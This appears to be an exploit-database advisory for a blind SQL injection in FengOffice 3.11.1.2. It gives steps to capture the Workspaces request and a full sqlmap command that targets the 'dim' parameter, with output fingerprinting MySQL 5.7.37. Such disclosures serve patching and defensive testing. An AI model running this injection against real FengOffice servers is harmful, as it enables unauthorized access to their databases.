Headline
FengOffice 3.11.1.2 SQL Injection
FengOffice version 3.11.1.2 suffers from a remote blind SQL injection vulnerability.
# Exploit Title: FengOffice - Blind SQL Injection# Date: 06/2024# Exploit Author: Andrey Stoykov# Version: 3.11.1.2# Tested on: Ubuntu 22.04# Blog:https://msecureltd.blogspot.com/2024/05/friday-fun-pentest-series-6.htmlSteps to Reproduce: 1. Login to application 2. Click on "Workspaces" 3. Copy full URL 4. Paste the HTTP GET request into text file 5. Set the injection point to be in the "dim" parameter value 6. Use SQLMap to automate the processsqlmap -r request.txt --threads 1 --level 5 --risk 3 --dbms=mysql -p dim--fingerprint[...][12:13:03] [INFO] confirming MySQL[12:13:04] [INFO] the back-end DBMS is MySQL[12:13:04] [INFO] actively fingerprinting MySQL[12:13:05] [INFO] executing MySQL comment injection fingerprintweb application technology: Apacheback-end DBMS: active fingerprint: MySQL >= 5.7 comment injection fingerprint: MySQL 5.7.37[...]